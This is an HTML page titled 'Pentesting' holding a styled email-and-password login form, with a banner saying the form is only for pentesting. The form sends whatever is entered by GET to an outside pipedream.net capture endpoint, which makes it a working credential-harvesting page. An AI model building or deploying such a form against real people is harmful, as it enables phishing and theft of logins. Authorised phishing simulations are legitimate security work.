<html>
  <head>
    <title>Pentesting</title>
    <style>
      body {
        background-color: black;
        color: white;
        font-family: Arial, sans-serif;
        text-align: center;
        padding-top: 50px;
      }

      h2 {
        color: red;
      }

      form {
        display: inline-block;
        background: linear-gradient(to bottom, orange, red);
        padding: 20px;
        border-radius: 10px;
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.5);
      }

      label {
        font-size: 16px;
        color: white;
        display: block;
        margin-bottom: 10px;
      }

      input[type="email"], input[type="password"] {
        width: 300px;
        padding: 12px;
        margin: 10px 0;
        border: 2px solid #333;
        background-color: #111;
        color: white;
        font-size: 14px;
        border-radius: 5px;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.3);
        text-align: center;
        opacity: 0.8;
        transition: opacity 0.3s;
      }

      input[type="email"]:focus, input[type="password"]:focus {
        opacity: 1;
        border-color: red;
      }

      input::placeholder {
        color: #888;
        font-style: italic;
      }

      input[type="submit"] {
        background-color: red;
        border: none;
        padding: 12px 20px;
        color: white;
        font-size: 16px;
        cursor: pointer;
        border-radius: 5px;
        transition: background-color 0.3s;
      }

      input[type="submit"]:hover {
        background-color: darkred;
      }
    </style>
  </head>
  <body>
    <h2>Please note: This form is only for pentesting. Do not fill it out.</h2>
    <form action="https://eoow6y96ffo9mzx.m.pipedream.net/" method="GET">
      <label for="email">Email:</label><br>
      <input type="email" id="email" name="email" placeholder="Input your email" required><br><br>
      
      <label for="password">Password:</label><br>
      <input type="password" id="password" name="password" placeholder="Input your password" required><br><br>
      
      <input type="submit" value="Submit">
    </form>
  </body>
</html>
